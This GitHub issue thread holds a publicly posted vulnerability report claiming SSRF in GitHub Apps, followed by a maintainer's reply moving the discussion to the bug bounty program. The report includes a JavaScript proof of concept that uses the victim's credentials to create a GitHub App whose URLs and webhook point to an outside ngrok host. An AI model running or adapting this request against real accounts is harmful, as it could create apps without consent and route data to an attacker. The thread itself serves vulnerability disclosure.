### ISSUE TITLE
GitHub Apps is vulnerable to SSRF vulnerability

### ISSUE THREAD

**Issue by imhunterand** [github/codeql#9881]
**Description of the issue**
I reported as policy https://bounty.github.com/
**Endpoint:**
```graphql
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/github.com\/settings\/apps", true);
xhr.setRequestHeader("content-type", "application\/x-www-form-urlencoded");
xhr.setRequestHeader("accept", "text\/html,application\/xhtml xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("accept-language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "commit=Create GitHub App&authenticity_token=yL06k-UtXKZ1MShFBxd5RkyPGJaiUqnXVOjlTBQUaHmfc7TL8SOCHqDKKaV2b205ws7VA7CGQk20XdqsfpCZnQ&integration[name]=imhunterand&integration[description]=&integration[url]=https://b60c-182-2-171-158.ap.ngrok.io/account&integration[application_callback_urls_attributes][0][_destroy]=false&integration[application_callback_urls_attributes][0][url]=https://b60c-182-2-171-158.ap.ngrok.io/account-set=1&integration[user_token_expiration_enabled]=0&integration[user_token_expiration_enabled]=1&integration[request_oauth_on_install]=0&integration[request_oauth_on_install]=1&integration[device_flow_enabled]=0&integration[device_flow_enabled]=1&integration[setup_on_update]=0&integration[hook_attributes][active]=0&integration[hook_attributes][active]=1&integration[hook_attributes][url]=https://b60c-182-2-171-158.ap.ngrok.io&integration[hook_attributes][_destroy]=false&integration[hook_attributes][secret]=&integration[hook_attributes][insecure_ssl]=0&integration[default_permissions][actions]=&integration[default_permissions][administration]=&integration[default_permissions][checks]=&integration[default_permissions][security_events]=&integration[default_permissions][codespaces]=&integration[default_permissions][codespaces_lifecycle_admin]=&integration[default_permissions][codespaces_metadata]=&integration[default_permissions][codespaces_secrets]=&integration[default_permissions][statuses]=&integration[default_permissions][contents]=&integration[default_permissions][vulnerability_alerts]=&integration[default_permissions][dependabot_secrets]=&integration[default_permissions][deployments]=&integration[default_permissions][discussions]=&integration[default_permissions][environments]=&integration[default_permissions][issues]=&integration[default_permissions][merge_queues]=&integration[default_permissions][metadata]=&integration[default_permissions][packages]=&integration[default_permissions][pages]=&integration[default_permissions][repository_projects]=&integration[default_permissions][pull_requests]=&integration[default_permissions][secret_scanning_alerts]=&integration[default_permissions][secrets]=&integration[default_permissions][single_file]=&integration[default_permissions][repository_hooks]=&integration[default_permissions][workflows]=&integration[default_permissions][organization_administration]=&integration[default_permissions][organization_user_blocking]=&integration[default_permissions][organization_events]=&integration[default_permissions][members]=&integration[default_permissions][organization_codespaces]=&integration[default_permissions][organization_codespaces_secrets]=&integration[default_permissions][organization_dependabot_secrets]=&integration[default_permissions][organization_plan]=&integration[default_permissions][organization_projects]=&integration[default_permissions][organization_secrets]=&integration[default_permissions][organization_self_hosted_runners]=&integration[default_permissions][team_discussions]=&integration[default_permissions][organization_hooks]=&integration[default_permissions][blocking]=&integration[default_permissions][codespaces_user_secrets]=&integration[default_permissions][emails]=&integration[default_permissions][followers]=&integration[default_permissions][gpg_keys]=&integration[default_permissions][gists]=&integration[default_permissions][keys]=&integration[default_permissions][interaction_limits]=&integration[default_permissions][plan]=&integration[default_permissions][profile]=&integration[default_permissions][starring]=&integration[default_permissions][watching]=&integration[public]=false";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i  )
aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody]));
}
```
@orangmuda

**Comment by edoardopirovano** [comment]
Hello. Thanks for reporting this via our bug bounty program. We will follow up there - we do not discuss potential vulnerabilities in public issues like this one. In future, we would ask you to keep all communication about vulnerabilities to the bug bounty program.

**Comment by imhunterand** [comment]
**Hi!** @edoardopirovano 

Thank you for your respond and fast resolved.
can you mark my reports as **resolved** here is my reports **[#1646084](https://hackerone.com/reports/1646084)**
